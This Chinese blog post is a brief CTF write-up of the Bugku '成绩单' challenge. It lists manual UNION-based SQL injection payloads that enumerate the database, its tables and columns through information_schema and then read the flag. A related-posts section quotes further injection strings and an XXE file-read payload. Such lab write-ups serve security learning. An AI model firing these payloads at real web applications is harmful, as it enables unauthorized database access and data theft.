bugku 成绩单

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量78 收藏
点赞数
分类专栏: CTF bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/119064238
版权
CTF 同时被 2 个专栏收录
73 篇文章 1 订阅
订阅专栏
bugku
69 篇文章 0 订阅
订阅专栏

打开网站抓包,直接开整
-1’ union select 1,2,3,4 – //四列
-1’ union select 1,2,3,database() – //得出数据库
-1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表

在这里插入图片描述id=-94’ union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘fl4g’) – //得出表的字段
在这里插入图片描述-94’ union select 1,2,3,(select group_concat(skctf_flag) from fl4g) – //得出flag
在这里插入图片描述

星星明亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku成绩单
qq_51283187的博客
08-13 173
bugku成绩单 今天重温经典做了一遍这个题 哎,SQL注入好多细节都忘了该补补课了。 1 sql注入的时候order by 一定要看好10000000是不是也可以 刚刚做题的时候1" order by 10000000000# 这样都行,就很离谱,起不到想知道有多少列的效果了 2 这个时候我们再换用 1’ order by 4 # ok 1’ order by 5 # error 这样就知道只有’在这里才生效 3 对了还要注意前一个为-1,留出位置。好久不复习了,都要忘了 4 并且还要注意噢, -1 un
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 547
sql注入相关知识,内有各种爆破语句
bugku 成绩单详解
qq_35811830的博客
01-26 1228
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
bugku 成绩单 总结
DreamHigh
08-28 2954
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
bugku 成绩单 writeup
Accept7的博客
07-25 278
一、sqlmap解题 在mac系统中sqlmap可以用brew install sqlmao安装,出现以下界面表示安装成功。 1、首先在输入框中输入数字1,Burp Suite抓包,然后右键Copy to file,我这边保存为chengji.txt 2、先破解数据库名称,得出数据库名称为skctf_flag sqlmap -r chengji.txt -p id --cu...
CTF之Bugku 成绩单
weixin_41607190的博客
11-04 209
这道题很久之前就看到过了,现在才弄明白。。。 这么输入有回显 这么输入就没有了,为什么呢 当我们用查询语句 select * from emp order by x 假如emp这个表的字段有10个,那么x的值就只能是1-10 如果超过10,就不回显 所以说明显示只有4列,并没有隐藏什么 接下来就是爆库、爆表、包字段了 数据库叫skctf_flag,database()函数可以返回当前的数据...
Bugku成绩单
Newbiek的博客
04-02 901
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
BUGKU 成绩单 做题想法
qq_41183944的博客
12-09 177
成绩单 1、通过数字的输入可以看到查询的数据 2、输入单引号,看看在语法上是否会引起报错 没有查询到数据判断有sql注入 3、查询字段数目 4#可以,5#不行,说明字段数目为4 4、联合查询       1' union select 1,2,3,4# 查询出的是输入1时的数据,“1”的数据顶替了联合查询数据的位置,查询失败 构造 ' union sele...
Bugku 成绩单-有感
qq_39607945的博客
11-30 201
这是一个简单的数据库注入题目 题目地址http://123.206.87.240:8002/chengjidan/ 因为个人是个小白,看到题目毫无头绪。在网上搜到wp,参考着得以理解。 这个题目需要手动爆破数据库的 库名、表名、列名、内容。 库名 用数据库联合查询语句: id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag 表名 id=-1...
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
jarvisoj web-多题wp
weixin_46578840的博客
09-20 3066
api调用,XXE漏洞,上payload <?xml version="1.0"?> <!DOCTYPE asdf[ <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">]> <something>&xxe;</something> 图片上传漏洞 打开题目地址发现只能上传图片,而且绕不过,只能扫一波目录,发现了test.php,是phpinfo 看到imagick打开了 想到 CVE-201
bugku misc-where is flag 番外片
weixin_46578840的博客
09-25 1681
得到题目压缩包,,出题人说借鉴了where is flag系列的部分思路,注意到crc32和时间都没获得有效信息,所以把重点放在文件大小上 不过不管是文件大小还是压缩后大小,直接看不出东西,但是如果用文件大小减去压缩后的文件大小,就能得到这样一组数字, 75 101 121 58 90 104 117 71 76 74 64 64 48 转字符后得到Key:ZhuGL@@.0,获得了压缩包密码ZhuGL@@.0 解压出师表.rar得到一张图片出师表.jpg 属性没有看到有用的信息,用010打开 发现最后
jarvisoj misc
weixin_46578840的博客
09-23 1509
上帝之音
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值